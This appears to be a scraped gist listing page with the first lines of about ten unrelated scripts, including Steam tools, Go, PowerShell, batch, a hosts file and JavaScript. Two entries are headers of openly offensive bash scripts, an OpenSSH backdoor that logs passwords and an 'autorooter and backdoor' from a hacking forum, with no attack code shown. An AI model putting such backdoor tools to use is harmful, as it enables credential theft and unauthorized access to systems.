This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Fetches an url and scan the html document for a regex pattern (the STEAM KEY) | |
| # monitoring if the KEY changes and copying it to the system's clipboard. | |
| # | |
| # Output: | |
| # CBT2J-R0GID-8FAJI -> 12:20 | |
| # K5RJH-86RH7-W0Y2W -> 12:25 | |
| # IV37H-83VGQ-MT9BF -> 12:30 | |
| # WY2T9-Q35ZV-8LYCX -> 12:35 | |
| # MR7BH-RJ3VJ-MADHW -> 12:40 | |
| # HBQPD-BFCG7-06577 -> 12:45 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -480p - Run tenfoot in 480p rather than 1080p | |
| -720p - Run tenfoot in 720p rather than 1080p | |
| -accesscode - | |
| -all_languages - show longest loc string from any language | |
| -batterytestmode - rapidly cycle battery percentages for testing | |
| -bigpicture - Start in Steam Big Picture mode | |
| -blefw - | |
| -cafeapplaunch - Launch apps in a cyber cafe context | |
| -candidates - Show libjingle candidates for local connection as they are processed | |
| -ccsyntax - Spew details about the localized strings we load |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ============================================ | |
| # satyr's openssh autobackdooring doohicky v0.-1 | |
| # ImpendingSatyr@gmail.com | |
| # ============================================ | |
| # USAGE: | |
| # Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). | |
| # If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything | |
| # (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. | |
| # [it'll install them via apt or yum, whichever is available]). |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // http://play.golang.org/p/fVf7duRtdH | |
| import "fmt" | |
| import "unicode/utf16" | |
| import "unicode/utf8" | |
| import "bytes" | |
| func main() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| This script prints a list of URLs required to download all the minecraft | |
| resources that the new launcher can access (jars, libraries, assets) | |
| Redirect stdout to a file to do something useful with it. | |
| Will store cached json indexes in | |
| versions.json | |
| versions/*.json |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Set-WindowState { | |
| <# | |
| .SYNOPSIS | |
| Set the state of a window. | |
| .DESCRIPTION | |
| Set the state of a window using the `ShowWindowAsync` function from `user32.dll`. | |
| .PARAMETER InputObject | |
| The process object(s) to set the state of. Can be piped from `Get-Process`. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| setlocal | |
| call :setESC | |
| cls | |
| echo %ESC%[101;93m STYLES %ESC%[0m | |
| echo ^<ESC^>[0m %ESC%[0mReset%ESC%[0m | |
| echo ^<ESC^>[1m %ESC%[1mBold%ESC%[0m | |
| echo ^<ESC^>[4m %ESC%[4mUnderline%ESC%[0m |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Found on: http://hackforums.net/showthread.php?tid=914128 | |
| # | |
| #Autorooter and backdoor bash-script | |
| #Hopefully this script will come to good use | |
| #Run n tell dat home, home, homeboy!! | |
| #by: ludwig @ SSTeam.info | |
| clear |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This MVPS HOSTS file is a free download from: # | |
| # http://winhelp2002.mvps.org/hosts.htm # | |
| # # | |
| # Notes: The Operating System does not read the "#" symbol # | |
| # You can create your own notes, after the # symbol # | |
| # This *must* be the first line: 127.0.0.1 localhost # | |
| # # | |
| #**********************************************************# | |
| # -------------- Updated: December-10-2016 --------------- # | |
| #**********************************************************# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function printDiv(divName){ | |
| var printContents = document.getElementById(divName).innerHTML; | |
| var originalContents = document.body.innerHTML; | |
| document.body.innerHTML = printContents; | |
| window.print(); | |
| document.body.innerHTML = originalContents; |
OlderNewer